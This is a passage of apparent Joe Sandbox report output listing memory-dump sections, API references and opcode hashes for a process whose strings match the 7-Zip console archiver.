                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                                                • Instruction ID: 1bc4046eec210907d70df016ea9f4d57d3d832dd657437a99e85abba706e2d33
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF0302225A68081CA10FF32C4A562E6730FBE7F81F099093EF6E53712CF38D406C214
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                                                                                                                • Instruction ID: 7a5e8136a1d3d933e3487be501c07ad9e876221a95fdda1e050c296fbca5aecb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAF0D02225A69185CA14FF32C45562E6731FBE7F81F099463EB6E63716CF38D806C614
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                                                                                                                • Instruction ID: 7bf7df33558dcde4379e87dde5f4e29e3db05445cfaa95b6b81d7d73b13602ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1F0DA22256A8185CA14FF32D46562F6330FBE7F81F09A463EB6E63712CF38D406C619
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                                                                                                                • Instruction ID: 3515e0fdb8802d023b6f57ca1bc08ecea24477357d67ced139bb3ac9b065c461
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F0FE21256A8085CA14FF32C46562E6330FBE7F81F08A463EB6E63712CF38D406C614
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$fputsmemset
• String ID:
• API String ID: 469995913-0
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmovewcscmp
• String ID:
• API String ID: 3584677832-0
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
• API String ID: 1294909896-2104980125
APIs
• free.MSVCRT ref: 001E04EE
  • Part of subcall function 001DFEC8: _CxxThrowException.MSVCRT ref: 001DFF2F
  • Part of subcall function 001DFEC8: free.MSVCRT ref: 001DFFAE
  • Part of subcall function 001DFEC8: _CxxThrowException.MSVCRT ref: 001DFFD1
  • Part of subcall function 001DFEC8: _CxxThrowException.MSVCRT ref: 001DFFF7
  • Part of subcall function 001DFEC8: _CxxThrowException.MSVCRT ref: 001E002B
• free.MSVCRT ref: 001E0523
• _CxxThrowException.MSVCRT ref: 001E0564
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: ExceptionThrow$free
• String ID: Incorrect wildcard type marker$Too short switch
• API String ID: 3129652135-1817034180
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmove
• String ID: #
• API String ID: 1534225298-1885708031
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: memsetstrlen$fputs
• String ID:
• API String ID: 2256168112-2735817509
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: ErrorLastfree
• String ID:
• API String ID: 2167247754-0
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$FileMove
• String ID:
• API String ID: 288606353-0
APIs
  • Part of subcall function 001D794C: FindClose.KERNELBASE ref: 001D795E
• SetLastError.KERNEL32 ref: 001D7BAA
• SetLastError.KERNEL32 ref: 001D7BB9
• FindFirstStreamW.KERNELBASE ref: 001D7BDB
• GetLastError.KERNEL32 ref: 001D7BEA
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: ErrorLast$Find$CloseFirstStream
• String ID:
• API String ID: 4071060300-0
APIs
• free.MSVCRT ref: 00217DA9
• free.MSVCRT ref: 00217DB2
• free.MSVCRT ref: 00217DE5
• free.MSVCRT ref: 00217DF2
• free.MSVCRT ref: 00217DFB
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F94DB
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F94E3
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F94F0
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F951C
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F9525
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F952D
  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F953A
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID: l}!
• API String ID: 1294909896-1752497331
APIs
Strings
• (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 0021CD2A
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputsfree
• String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
• API String ID: 2581285248-171671738
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free$memmove
• String ID:
• API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
                                                                                                                                                                                                                                • Instruction ID: 24edbf3f7092803fffc982ccfc69875842a9b6c7f6bb8e81a087f84be9b4ae43
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F218463215940A1CA20EF24E85119EA731EBE27E0F545223FF6E877A9DF39C646C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$fputc
                                                                                                                                                                                                                                • String ID: Time =
                                                                                                                                                                                                                                • API String ID: 1185151155-458291097
                                                                                                                                                                                                                                • Opcode ID: 125f46871291328263d9a45044a61c5585df70acc1ace0c9469d427cba69f483
                                                                                                                                                                                                                                • Instruction ID: 0c3ae9a425372543429bd4454747fafbb547630bd37d2d79c3cb402f3a4352f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 125f46871291328263d9a45044a61c5585df70acc1ace0c9469d427cba69f483
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6521B765350A1185EB08AF1BED583995362B7A8FC4F48F036DD2E17768DD3CC896C340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSectionfreememmove$EnterExceptionLeaveThrow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 202075352-0
                                                                                                                                                                                                                                • Opcode ID: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                                                                                                                • Instruction ID: c363ae9a29afadea17cee6d12128799d2d215be29df0f2f396986db0cd124c84
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE21C17323075486CB60EF26D9456AC7320F345BE5FA05326EE3917AA9DF35C896CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                                                • Instruction ID: 07223e4a58da6cfe4f3c088bafaec1e49a826bae4f33254133ca658f50f4c7e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B311FA2320298485CA11AF35D8516692321EBA6FA8F1D8272EF7D577A9CF34D847C324
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                                                                                                                • Instruction ID: 3f53efcb07785f03181760bbf2e1e5dd716fca1d434d3976357421f009ca1d50
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C015E23B01984898B25FE26D9512686331ABB5FA4B2D4266EF3D1B759DF30D8428350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                                                                                                                • Instruction ID: b4dd4d238d66451906139a56c986d57692fc7a470e803311b2a5e9d79b23f47a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5111223752A4085CB20AF35D85166D2324EBA6FA4F1D8272DF6D5B795CF30D856C350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00216B7C
                                                                                                                                                                                                                                  • Part of subcall function 001D6618: FormatMessageW.KERNEL32 ref: 001D6676
                                                                                                                                                                                                                                  • Part of subcall function 001D6618: LocalFree.KERNEL32 ref: 001D6698
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
                                                                                                                                                                                                                                  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
                                                                                                                                                                                                                                • free.MSVCRT ref: 00216BAE
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00216BCC
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputsfree$FormatFreeLocalMessagefputc
• String ID: : $----------------
• API String ID: 1215563195-4071417161
• Opcode ID: a844113c29b51b67a554de1085d4dbdaa26cfeae81c93ca6df2fe7833a2ff0cb
• Instruction ID: 501048cb1da7e4190590ecc1dfcf0b1fa45d34863972ccb5d08e54adaad180e2
• Opcode Fuzzy Hash: a844113c29b51b67a554de1085d4dbdaa26cfeae81c93ca6df2fe7833a2ff0cb
• Instruction Fuzzy Hash: 6F01657270194595DA10EF26E98476E7321F7A9BE4F148226EE7E07794CF3CD546C700
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
• Instruction ID: a8a5ee5a1c47ac26b33518d85f486019c4431562c278910769c721d84fc31a61
• Opcode Fuzzy Hash: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
• Instruction Fuzzy Hash: 99F0C923B1185489CA15BF26DD915AC2730ABB6FE571D8162EF3D5B359CF30D89283A0
APIs
• fputs.MSVCRT ref: 0021BCD4
  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
• fputs.MSVCRT ref: 0021BD17
  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
• free.MSVCRT ref: 0021BD2B
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputsfree$fputc
• String ID: : $Write SFX:
• API String ID: 3584323934-2530961540
• Opcode ID: 0858727a3d2188373386701502e4491ffbda9cac782742d358bcdb59749fd626
• Instruction ID: cf63684ac3cfd274d62e3fe7013a7e614e8d791df32869aae9dbe4c7e29ffc39
• Opcode Fuzzy Hash: 0858727a3d2188373386701502e4491ffbda9cac782742d358bcdb59749fd626
• Instruction Fuzzy Hash: 090125A231094050DA209F25E95439A5321F7A8FF4F489232AE3E477A9DF28C586C710
APIs
• fputs.MSVCRT ref: 0021BB49
• fputs.MSVCRT ref: 0021BB76
  • Part of subcall function 001D2568: free.MSVCRT ref: 001D25B5
  • Part of subcall function 001D2568: free.MSVCRT ref: 001D25C0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: fputsfree
• String ID: Creating archive: $StdOut$Updating archive:
• API String ID: 2581285248-1319951512
• Opcode ID: fa99d9322174690535497a2fdc6b3fb821a8ef614adec2876cfee3e0304a3bf5
• Instruction ID: 6031657f402b104988b925e4fd8fd1e7bc00005ebae6a60c1023953106438eb5
• Opcode Fuzzy Hash: fa99d9322174690535497a2fdc6b3fb821a8ef614adec2876cfee3e0304a3bf5
• Instruction Fuzzy Hash: FEF062A5315A8591DE05DF26EA983AC6371BB68FD4F48D432CD1E0B718DF2CC499C300
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
• Instruction ID: 21b862151eaf05396f6c9e9001bd281a3c238636aa937872c35a7fd443b6d425
• Opcode Fuzzy Hash: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
• Instruction Fuzzy Hash: FDE0C22261040481DB14AF76DCA21282334ABB5F8871890A3DB3E8B325CE30E85283A4
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
